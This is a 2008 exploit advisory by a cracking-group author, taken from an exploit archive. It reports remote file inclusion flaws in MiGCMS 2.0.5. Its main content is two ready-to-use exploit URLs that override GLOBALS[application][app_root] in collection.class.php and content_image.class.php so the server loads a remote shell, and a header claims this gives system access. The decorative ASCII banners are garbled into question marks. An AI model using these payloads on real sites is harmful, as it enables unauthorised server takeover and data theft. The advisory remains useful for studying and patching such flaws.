MiGCMS 2.0.5 Multiple Remote File Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MiGCMS 2.0.5 Multiple Remote File Inclusion Vulnerabilities
# Published : 2008-06-22
# Author : CraCkEr
# Previous Title : RSS-Aggregator (display.php path) Remote File Inclusion Vulnerability
# Next Title : HoMaP-CMS 0.1 (plugin_admin.php) Remote File Inclusion Vulnerability

???????????????????????????????????????????????????????????????????????????????
??                             C r a C k E r                                ??
??          T H E   C R A C K   O F   E T E R N A L   M I G H T             ??
??????????????????????????????????????????????????????????????????????????????

 ?????      From The Ashes and Dust Rises An Unimaginable crack....      ?????
??????????????????????????????????????????????????????????????????????????????
??                         [ Remote File Include ]                          ??
??????????????????????????????????????????????????????????????????????????????
:   Author   : CraCkEr                : :                                    :
?   Group    : uNiTeD CraCkiNg ForCE  ? ?                                    ?
?   Script   : MiGCMS 2.0.5           ? ?         Register Globals :         ?
?   Download : SourceForge.net        ? ?                                    ?
?   Method   : GET                    ? ?          [?] ON   [ ] OFF          ?
?   Critical : High [????????]        ? ?                                    ?
?   Impact   : System access          ? ?                                    ?
? ????????????????????????????????????? ???????????????????????????????????? ?
?                              DALnet #crackers                             ??
??????????????????????????????????????????????????????????????????????????????
:                                                                            :
?  Release Notes:                                                            ?
?  ?????????????                                                             ?
?  Typically used for remotely exploitable vulnerabilities that can lead to  ?
?  system compromise.                                                        ?
?                                                                            ?

??????????????????????????????????????????????????????????????????????????????
??                             Exploit URL's                                ??
??????????????????????????????????????????????????????????????????????????????
  

http://localhost/path/lib/obj/collection.class.php?GLOBALS[application][app_root]=[SHELL]
http://localhost/path/lib/obj/content_image.class.php?GLOBALS[application][app_root]=[SHELL]



??????????????????????????????????????????????????????????????????????????????
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS

??????????????????????????????????????????????????????????????????????????????
??                              ? CraCkEr 2008                              ??
??????????????????????????????????????????????????????????????????????????????


# www.Syue.com [2008-06-22]